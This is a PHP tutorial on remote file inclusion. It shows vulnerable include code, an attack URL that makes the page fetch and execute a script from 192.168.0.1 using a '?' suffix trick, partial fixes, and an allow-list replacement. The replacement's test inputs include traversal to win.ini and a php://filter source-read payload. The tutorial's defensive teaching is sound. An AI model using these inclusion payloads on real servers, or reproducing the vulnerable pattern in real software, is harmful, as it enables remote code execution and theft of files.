
PHP network development: a detailed explanation of the remote file inclusion vulnerability (PHP tutorial)

WBOY (original), 2016-07-21 15:38:43

The following code includes a file chosen by the filename parameter in the browser's address bar.

The code is as follows:

<?php
$file_name = $_GET["filename"]; // Take the file name from the query string
include("$file_name.php");      // Include that file; the .php suffix is appended by the code
// Some other operations
?>

With this in place, specifying different file names in the address bar includes and executes different files. For example, requesting http://localhost/test.php?filename=myinc includes and executes myinc.php (the code appends the .php suffix itself).

Because the code performs no error handling, requesting the page without a parameter produces the following output:

Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3

These messages tell a visitor two things: the page passes the parameter straight to include(), and the server runs on Windows under C:\Program Files\xampp. The visitor can now host a script on a server they control and point the parameter at it. Note that when PHP includes a remote URL it includes whatever the remote web server sends back, not the file as stored on that server: a script saved as hello.php would be executed by the remote server and only its output would arrive, so the script is saved with a .txt extension, which the remote server serves as plain text. Here the script lives on the server 192.168.0.1 as hello.txt:
The code is as follows:

<?php
echo "hello world!"; // Executed on localhost, not on 192.168.0.1
?>

Requesting http://localhost/test.php?filename=http://192.168.0.1/hello.txt? now makes test.php fetch hello.txt from 192.168.0.1 and execute it locally. The trailing question mark matters: the code appends .php, so the URL PHP actually opens is http://192.168.0.1/hello.txt?.php, and the remote web server ignores the query string and serves hello.txt. Remote inclusion only works at all when allow_url_include is On (allow_url_fopen must be On as well); since PHP 5.2.0 allow_url_include defaults to Off, and a server on which it is Off will not fetch the remote file no matter how the script is written.

The first countermeasure is to stop leaking the error message, so that a visitor cannot tell that the script includes the file named in the parameter. The modified code is as follows.
The code is as follows:

<?php
$file_name = $_GET["filename"];    // Take the file name from the query string
if (!@include("$file_name.php")) { // Include the file; @ suppresses the warnings
    die("An error occurred while browsing the page");
}
// Some other operations
?>

After this change, when the included file cannot be found the visitor sees only "An error occurred while browsing the page"; the @ suppresses the two warnings, so the file path and include_path no longer leak. Be clear about what this buys: it hides the nature of the operation, but the include of an attacker-supplied URL still succeeds exactly as before, so on its own it does not remove the vulnerability.

The second method aims at the remote inclusion itself: every slash "/" is removed from the parameter, so a URL passed in the address bar no longer reaches include() in a form PHP can open as a URL. The modified code is as follows.
The code is as follows:

<?php
$file_name = str_replace('/', '', $_GET["filename"]); // Strip every slash from the parameter
if (!@include("$file_name.php")) {                    // Include the file; @ suppresses the warnings
    die("An error occurred while browsing the page");
}
// Some other operations
?>

Now a request for http://localhost/test.php?filename=http://192.168.0.1/hello.txt? leaves the code trying to include a local file named http:192.168.0.1hello.txt?.php, which does not exist, so the remote file is not fetched and the generic error message is shown instead. Treat this as a stop-gap rather than a fix: it is a denylist of a single character. On a Windows host such as the XAMPP installation in the error messages above, backslashes also separate path components and pass through the filter untouched, and nothing here restricts the parameter to the handful of pages the application actually means to include. The durable remedy is to keep allow_url_include=Off in php.ini (the default since PHP 5.2.0) and to accept only parameter values that match a fixed list of allowed page names.
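The following is the hardened replacement for both patched blocks above, added here as an example and not taken from the tutorial. Instead of sanitising the parameter, it compares the value against a fixed list of page names and then checks that the resolved file really lies inside the page directory. The directory ./pages/, the page names home, about and myinc, and PHP 7.1 or later are assumptions of the example.

```php
<?php
// Added example, not code from the original tutorial: an allow-list based
// replacement for include("$file_name.php").
// Assumptions (hypothetical): includable pages live in ./pages/ and are named
// home.php, about.php and myinc.php. Server side, php.ini should also keep
// allow_url_include = Off (the default since PHP 5.2.0) and display_errors = Off
// with log_errors = On, so warnings go to the log instead of to the visitor.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// The complete set of values ?filename= may take. Anything else is refused
// before it reaches include(), so http://, php:// or data: wrappers, "../",
// Windows "..\" and the "?.php" suffix trick cannot be expressed at all.
const ALLOWED_PAGES = ['home', 'about', 'myinc'];

/** Allow-list check on the raw parameter: exact, case-sensitive match only. */
function is_allowed_page(string $requested): bool
{
    return in_array($requested, ALLOWED_PAGES, true);
}

/**
 * Resolve an allow-listed page name to the absolute path of its .php file,
 * or return null if the name is not allowed, the file is missing, or the
 * file resolves to somewhere outside PAGES_DIR.
 */
function resolve_page(string $requested): ?string
{
    if (!is_allowed_page($requested)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: even an allow-listed name must resolve to a file
    // strictly inside PAGES_DIR (guards against a symlink or a bad list entry).
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the first is a legitimate page, the others are the
    // kinds of value the tutorial's str_replace('/') filter lets through or
    // only partially mangles. Run with: php test.php
    $samples = [
        'about',
        'http://192.168.0.1/hello.txt?',
        '..\\..\\windows\\win.ini',
        'php://filter/convert.base64-encode/resource=index',
        'About',
    ];
    foreach ($samples as $s) {
        printf("%-55s %s\n", var_export($s, true), is_allowed_page($s) ? 'allowed' : 'REJECTED');
    }
    exit;
}

$page = resolve_page((string)($_GET['filename'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

Only 'about' passes the check; 'About' is rejected as well, which matters on a Windows file system where About.php and about.php are the same file. The decision is made on the raw parameter before any path is built, so there is no character set to enumerate and nothing for a new PHP stream wrapper or encoding trick to slip past.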
